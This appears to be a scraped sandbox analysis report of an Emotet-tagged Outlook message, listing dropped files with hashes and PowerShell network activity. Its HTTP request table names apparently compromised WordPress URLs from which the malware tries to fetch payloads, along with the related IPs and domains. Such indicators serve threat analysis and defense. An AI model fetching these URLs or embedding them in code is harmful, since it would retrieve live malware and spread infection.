SHA256: c4c9a90f2c961d9ee79cf08fbee647ed7de0202288e876c7baad00f4ca29ca16

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_98D2D5BCF7B8734F9FD8C65A80C8688A.dat

xml

MD5: b21ed3bd946332ff6ebc41a87776c6bb

SHA256: b1aac4e817cd10670b785ef8e5523c4a883f44138e50486987dc73054a46f6f4

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{81EDCD2E-E848-4DA6-A8C2-7D26B3B1C712}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.png

image

MD5: 7d80c0a7e3849818695eaf4989186a3c

SHA256: 72dc527d78a8e99331409803811cc2d287e812c008a1c869a6aea69d7a44b597

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm

pgc

MD5: 3b4c8693ed5740e07532287946f02081

SHA256: 2a39cf56cf876758ebae3c676823ffc5351c1c4aa4e610b940db7916201e534a

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inf

text

MD5: 48dd6cae43ce26b992c35799fcd76898

SHA256: 7bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Temp\outlook logging\firstrun.log

text

MD5: b2db73134c8e7f3cb5e8d7b8b574af74

SHA256: 6b98146b8d215d0d3c66f1e8ee2f71b90093ce4893533ae3e50835e80a939947

2428

OUTLOOK.EXE

C:\Users\admin\AppData\Local\Temp\CVRA7E3.tmp.cvr

––

MD5: ––

SHA256: ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2428	OUTLOOK.EXE	GET	404	64.4.26.155:80	http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig	US	xml	345 b	whitelisted
236	powershell.exe	GET	404	212.64.97.231:80	http://www.huangyifan.com/wp-includes/dupai/	NL	xml	345 b	suspicious
236	powershell.exe	GET	404	221.141.3.55:80	http://www.picogram.co.kr/fo/wp-content/tbh5/	KR	xml	345 b	suspicious
236	powershell.exe	GET	404	14.225.5.148:80	http://tienphongmarathon.vn/wp-content/002jp2/	VN	xml	345 b	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	ASN	CN	Reputation
2428	OUTLOOK.EXE	64.4.26.155:80	Microsoft Corporation	US	whitelisted
236	powershell.exe	212.64.97.231:80		NL	suspicious
236	powershell.exe	221.141.3.55:80	SK Broadband Co Ltd	KR	suspicious
236	powershell.exe	14.225.5.148:80	VIETNAM POSTS AND TELECOMMUNICATIONS GROUP	VN	unknown
236	powershell.exe	34.90.44.14:443		US	unknown
236	powershell.exe	165.22.112.229:443		US	unknown

DNS requests

Domain	IP	Reputation
config.messenger.msn.com	64.4.26.155	whitelisted
www.huangyifan.com	212.64.97.231	suspicious
www.picogram.co.kr	221.141.3.55	suspicious
tienphongmarathon.vn	14.225.5.148	unknown
nisantasicantacisi.com	34.90.44.14	unknown
yoobaservice.com	165.22.112.229	unknown

Threats

No threats detected.

Debug output strings

No debug info.

General Info

RE Bemobile Limited (PNGPM SLBBM) SIM Audit 2019 .msg

emotet-doc

emotet

Take your security to the next level

b7d979a55307e5d8c3e6b446683b2e5b

14c9de227c42b123af3b5df17166cc091426710d

2be35b9061b98d4ce81ed08ae68a0c215abdd14a61ebcb6ed45d7f9cc043342b

6144:uengUu1fLFxmxYAgOLA+biMpzCWoN8OB:uengUu1fLFx8gUjbiGCWoCO

Launch configuration

Software preset

Hotfixes

Behavior activities

Static information

Screenshots

Processes

Behavior graph

Process information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings

Take your security
to the next level